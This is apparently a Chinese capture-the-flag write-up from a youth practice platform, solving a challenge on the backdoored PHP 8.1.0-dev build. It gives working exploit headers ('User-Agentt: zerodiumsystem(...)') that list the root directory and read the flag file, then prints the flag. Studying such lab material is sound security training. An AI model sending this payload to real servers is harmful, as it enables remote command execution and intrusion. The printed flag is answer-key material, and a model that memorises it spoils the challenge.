青少年CTF练习平台 PHP的后门

马船长2025-01-25 0:35

题目

根据提示,PHP/8.1.0-dev漏洞,修改请求头利用此漏洞

注意 zerodium后面拼接函数发送

html 复制代码 
User-Agentt:zerodiumsystem("ls /");

读取flag

html 复制代码 
User-Agentt: zerodiumsystem("cat /flag");

拿下flag

flag{d514c824035b427da2d1c14edb5ae098}

相关推荐
johnrui17 小时前
JUC之AQS
java·开发语言·jvm
沫璃染墨17 小时前
红黑树完全指南:从核心原理到插入验证全实现
开发语言·c++·算法
yu859395817 小时前
基于 QT5.7.0 的八线激光雷达点云聚类实现
开发语言·qt·聚类
号码认证服务17 小时前
客户看到来电显示公司名会更愿意接听吗?企业号码认证提升ROI
服务器·网络·c++·经验分享·智能手机·云计算·php
yoyo_zzm17 小时前
汇编到PHP:五大编程语言核心特性全解析
开发语言·汇编·php
.ZGR.17 小时前
线程池相关知识及并发统计案例实现
java·开发语言
流年如夢17 小时前
初入C++
开发语言·c++
zzzsde17 小时前
【Linux】线程同步和互斥(1):线程互斥与加锁实现
linux·运维·服务器·开发语言·算法
yoyo_zzm17 小时前
编程语言大比拼:C++到PHP全解析
开发语言·c++·php
山栀shanzhi17 小时前
TCP 三次握手四次挥手
服务器·tcp/ip·php
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03Gemini大升级、AI眼镜首发、Android XR亮相,13天后见分晓04【AI】2026 年具身智能模型和世界模型总结05CC-Switch & Claude 基于 Linux 服务器安装使用指南06Codex 手机端连接教程:三分钟搞定,附完整步骤07人工智能最新动态 AI 日报 · 2026年5月10日08几个好用的ip纯净度检测网站09裂开!ChatGPT 居然开始要手机号验证,附详细解决方法10【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法